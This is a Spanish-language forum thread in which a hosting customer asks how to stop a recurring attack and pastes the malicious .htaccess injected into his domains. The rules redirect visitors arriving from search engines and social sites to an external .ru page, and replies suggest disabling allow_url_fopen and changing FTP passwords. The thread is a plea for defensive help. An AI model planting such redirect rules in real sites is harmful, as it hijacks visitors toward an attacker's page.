Prevenir RFI en .HTACCESS

insyse · #1 (**permalink**) 24/07/2011, 12:28

Hola,
en mi hosting, me estan inyectando el archivo .HTACCESS en el root de cada dominio.

el contenido del archivo es este:

RewriteEngine On
ErrorDocument 400 http://programmengineering.ru/check/index.php
ErrorDocument 401 http://programmengineering.ru/check/index.php
ErrorDocument 403 http://programmengineering.ru/check/index.php
ErrorDocument 404 http://programmengineering.ru/check/index.php
ErrorDocument 500 http://programmengineering.ru/check/index.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://programmengineering.ru/check/index.php [R=301,L]

Que puedo hacer para evitar este tipo de ataques?

He buscado en google, y he encontrado varias cosas, sobre todo con respecto a INCLUDE() de php.

El problema es que gran parte de mis sitios son wordpress (actualizados) y no se como llegar a modificar las funciones INCLUDE() de wordpress...

Que otra cosa puedo hacer?

Ya he cambiado las contraseñas del sitio por si alguien va a sugerirlo...

Quedo en espera de sus comentarios.

maycolalvarez · #2 (**permalink**) 24/07/2011, 16:38

si el problema es de PHP, desactiva allow_url_fopen, si no es que tienes una inyección en algún upload, además de que debes cambiar la clave del FTP

insyse · #3 (**permalink**) 24/07/2011, 19:52

Estoy mirando en las configuraciones de PHP.INI y veo que aparece así:

allow_url_fopen = 0

esto es activado o desactivado?

pateketrueke · #4 (**permalink**) 24/07/2011, 20:08

Cita:

Iniciado por insyse

Estoy mirando en las configuraciones de PHP.INI y veo que aparece así:

allow_url_fopen = 0

esto es activado o desactivado?

Sentido común:

1 => TRUE => YES => ON
0 => FALSE => NO => OFF

Si te queda duda no dudes en Googlear:
php allow_url_fopen